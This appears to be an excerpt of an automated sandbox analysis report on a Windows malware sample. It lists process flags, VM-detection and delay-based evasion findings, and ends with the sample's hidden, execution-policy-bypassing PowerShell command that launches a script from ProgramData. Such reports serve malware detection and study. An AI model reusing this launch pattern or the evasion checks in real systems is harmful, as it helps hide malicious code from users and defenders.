            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

            Malware Analysis System Evasion

            barindex
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Windows\System32\wscript.exeWindow found: window name: WSH-TimerJump to behavior
            Source: C:\Windows\System32\wscript.exeWindow found: window name: WSH-TimerJump to behavior
            Source: C:\Windows\System32\wscript.exeWindow found: window name: WSH-Timer
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 4877Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 4730Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2647Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 773Jump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWindow / User API: threadDelayed 1303Jump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWindow / User API: threadDelayed 8530Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3336
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 6484
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7264Thread sleep count: 4877 > 30Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7252Thread sleep count: 4730 > 30Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7380Thread sleep time: -16602069666338586s >= -30000sJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7352Thread sleep count: 2647 > 30Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7336Thread sleep count: 773 > 30Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7368Thread sleep time: -1844674407370954s >= -30000sJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8100Thread sleep count: 3336 > 30
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8104Thread sleep count: 6484 > 30
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8136Thread sleep time: -14757395258967632s >= -30000s
            Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
            Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: wscript.exe, 00000003.00000002.1958669324.00000295AE872000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}8b}\
            Source: RegSvcs.exe, 0000000C.00000002.4154165878.0000000000BC1000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll=b
            Source: wscript.exe, 0000000D.00000002.2533404054.00000275A3C00000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeMemory allocated: page read and write | page guardJump to behavior

            HIPS / PFW / Operating System Protection Evasion

            barindex
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Powershell -noP -W hidden -ep byPass -NONI "C:\ProgramData\Music\Visuals\VsLabsData.ps1"
